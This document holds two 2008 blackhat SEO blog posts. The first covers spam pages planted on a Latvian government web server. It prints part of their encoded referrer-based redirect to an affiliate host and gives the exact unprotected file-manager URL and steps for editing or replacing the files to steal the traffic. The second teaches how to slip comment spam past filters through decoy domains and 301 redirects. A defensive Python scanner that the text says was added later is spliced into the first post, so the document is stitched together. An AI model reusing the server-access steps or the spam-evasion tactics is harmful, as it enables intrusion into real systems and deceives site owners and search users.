Blackhat SEO and hacking

Posted by admin | Black Hat SEO | Friday 16 May 2008 6:51 am

If you are like me, you probably track a couple of pharm-related queries on Google to understand more about the BlackHat SEO strategies that are really working. I came across this article in French where the author, a French blackhat, explains a discovery he made while looking at the Google results for a Viagra-related query.

This webpage (http://sf.lm.gov.lv/CMS/modules/EReditor/jscripts/tiny_mce/plugins/filemanager/files/esf/in/buycheapviagraonlineukwr.htm)

is on one of the webservers of the government of Latvia and was definitely not put there by government officials. If you were visiting this URL from Google, you were redirected to a pharm affiliate site. If you were visiting this URL directly, you were redirected to a porn site. The redirection is made using encoded JavaScript, as usual. Once he decoded the JavaScript, we can see that the redirection is made using this URL. (You can see the code in the original article if you want to see it.)

http://www.finance-leaders.com/feed2.php?keyword="+ escape("188")+"&feed=8&ref="+ escape(document.referrer))
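A defender's counterpart to the behaviour described above, as an added example that is not from the original article: a Python scan that peels percent-encoded layers from inline scripts and flags pages where a `document.referrer` read and a navigation only show up after decoding. The indicator names, the sample pages and `redirector.example` are constructed, and the heuristic assumes percent-encoding is the obfuscation layer.

```python
import re
from pathlib import Path
from urllib.parse import unquote

SCRIPT = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
DECODER = re.compile(r"\b(?:unescape|eval|decodeURIComponent|atob)\s*\(|String\.fromCharCode")
NAVIGATE = re.compile(r"\blocation(?:\.href)?\s*=(?!=)|\blocation\.(?:replace|assign)\s*\(")
ENCODED_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}){8,}")  # 8+ consecutive %XX bytes

def audit_page(html, max_layers=3):
    """Collect indicators from inline scripts, peeling percent-encoded layers."""
    found = set()
    for layer in SCRIPT.findall(html):
        for depth in range(max_layers):
            if DECODER.search(layer):
                found.add("decoder-call")
            if NAVIGATE.search(layer):
                found.add("navigation-sink")
            if "document.referrer" in layer:
                found.add("referrer-read" if depth == 0 else "hidden-referrer-read")
            if not ENCODED_RUN.search(layer):
                break
            layer = unquote(layer)  # decode one layer and inspect it again
    return found

def verdict(html):
    """cloaked-redirect: referrer-dependent navigation that is hidden behind encoding."""
    found = audit_page(html)
    if {"hidden-referrer-read", "navigation-sink"} <= found:
        return "cloaked-redirect"
    if {"referrer-read", "navigation-sink"} <= found:
        return "review"
    return "clean"

def scan_tree(root):
    """Map every non-clean .htm/.html file under root (e.g. an upload directory) to its verdict."""
    hits = {}
    for path in Path(root).rglob("*.htm*"):
        if path.is_file():
            result = verdict(path.read_text(encoding="utf-8", errors="replace"))
            if result != "clean":
                hits[str(path)] = result
    return hits

# Constructed samples for illustration (not taken from the compromised page).
_payload = 'location.href="http://redirector.example/feed.php?ref="+escape(document.referrer);'
CLOAKED = ("<h1>keyword keyword</h1><script>eval(unescape('"
           + "".join(f"%{b:02X}" for b in _payload.encode()) + "'))</script>")
ANALYTICS = "<script>var r = document.referrer; track(r);</script>"
```

Pointing `scan_tree` at a CMS file manager's upload directory is the natural use, since static HTML with inline script has little reason to exist there.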

The website http://sf.lm.gov.lv/ has a security problem that anyone can exploit right now.

The important point is that anyone can modify the JavaScript to redirect the traffic to the page they want. (No point in doing that now: first, it’s illegal, and second, the page isn’t indexed in Google anymore.)

All you have to do is go to

http://sf.lm.gov.lv/CMS/modules/EReditor/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&url=/CMS/modules/EReditor/jscripts/tiny_mce/plugins/filemanager/files/esf/in/buycheapviagraonlineukwr.htm&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true

and then go into the sub-directory /esf/in, where the page buycheapviagraonlineukwr.htm is. You can edit it, delete it and replace it with whatever you want (so basically changing the redirect to your own affiliate account). Google isn’t able to understand the encoded JavaScript but sees the keyword-filled page.

Something the original article doesn’t talk about is how the blackhat who made that page built links to it.

What we can learn using Yahoo is that the number of links pointing to the page is very low, and that it was link-built using the usual blackhat pattern of spamming guestbooks and forums. But what is weirder is that the domain has been link-built by the blackhats, according to Yahoo linkdomain. And looking at those URLs, you can find plenty of vulnerable webservers that are used to spam the hell out of the search engines.

And because the blackhat cannot protect his work (sure, he hacked those webservers and cannot patch them), anyone can go and switch the affiliate code. By the way, this page was 11th on one of the biggest keywords.

2008 is the year when Blackhat SEO met hacking on a larger scale. This is just one piece of proof.

BlackHat SEO Strategy

Posted by admin | Black Hat SEO | Friday 25 January 2008 9:16 am

I was thinking about blog comment spam for hard-to-cover niches (adult/casino/pharm) and other stuff like that, where you can’t just put a URL like www.extracheappokerchips.com because you are for sure going to be filtered by plug-ins like Akismet or manually deleted by blog admins. But there is a strategy you can use that could pass most of the filters.

First, you need a domain name that sounds “legit” and that you don’t really care about. Once it’s registered, you have 2 strategies you can use to bring some traffic/links to your domain in a harder-to-spam niche.

First strategy: you simply 301 the new domain to your harder-to-spam domain. This way you get all the links and traffic directly to your domain, and if the blog admin doesn’t take the time to click the link (and only sees something like www.mypersonnalboringblog.com), he probably won’t filter it. So you will get the backlinks and traffic directly to your money domain, cool no?

The second strategy is kind of the same as the first, but a little more evolved. You just put up a real website/blog on the temporary domain, then when you have the amount of links/traffic you want on it, you 301 it to your money domain. This way you can add a couple of social media frontpages and backlinks to the domain, using the words that you want backlinks on, without looking like, let’s say, a casino domain. So you make a post about “chips” (as in “poker chips”), a post about Russian roulette (as in roulette), etc. Then when you 301 the domain to your casino website, all the links will still be targeted ;)

Don’t abuse these methods, but they are very hard-to-track black hat SEO strategies that can give awesome results.